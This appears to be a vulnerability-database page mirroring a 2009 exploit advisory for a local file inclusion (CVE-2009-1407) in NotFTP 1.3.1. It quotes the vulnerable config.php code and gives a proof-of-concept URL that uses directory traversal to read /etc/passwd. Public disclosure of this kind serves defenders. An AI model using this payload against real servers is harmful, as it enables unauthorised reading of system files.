Lucene search
+L

NotFTP 1.3.1 - 'newlang' Local File Inclusion

🗓️ 21 Apr 2009 00:00:00Reported by KacperType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 40 Views

NotFTP 1.3.1 'newlang' Local File Inclusion vulnerabilit

Related
Code
ReporterTitlePublishedViews
Family
circl
Circl
CVE-2009-1407
21 Apr 200900:00
circl
cve
CVE
CVE-2009-1407
24 Apr 200914:00
cve
cvelist
Cvelist
CVE-2009-1407
24 Apr 200914:00
cvelist
euvd
EUVD
EUVD-2009-1405
7 Oct 202500:30
euvd
nvd
NVD
CVE-2009-1407
24 Apr 200914:30
nvd
openvas
OpenVAS
NotFTP 'config.php' Local File Include Vulnerability
24 Apr 200900:00
openvas
openvas
OpenVAS
NotFTP 'config.php' Local File Include Vulnerability
24 Apr 200900:00
openvas
prion
Prion
Directory traversal
24 Apr 200914:30
prion
seebug
seebug.org
NotFTP config.php本地文件包含漏洞
28 Apr 200900:00
seebug
NotFTP 1.3.1 => Local file include
http://sourceforge.net/projects/notftp/


Author: Kacper
Email: [email protected]
Home: http://devilteam.pl/

DC++ Hub address: bluber-hub.no-ip.biz:2008

Vuln:

File config.php:

#########################################################################
# This is where we decide what language to use. Don't mess with this
# either.
#########################################################################

if (isset($newlang))
{
   require_once("lib/lang/".$languages[$newlang]["file"]);
}
elseif (isset($_COOKIE["notftplang"]))
{
   require_once("lib/lang/".$languages[$_COOKIE["notftplang"]]["file"]);
}
else
{
   require_once("lib/lang/".$languages[DEFAULTLANG]["file"]);
}

# NotFTP version. Changing this would be silly. So don't.

PoC:

http://site.pl/path/config.php?newlang=kacper&languages[kacper][file]=../../../../../etc/passwd

The End

=========

# milw0rm.com [2009-04-21]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

21 Apr 2009 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 26.8
EPSS0.01885
40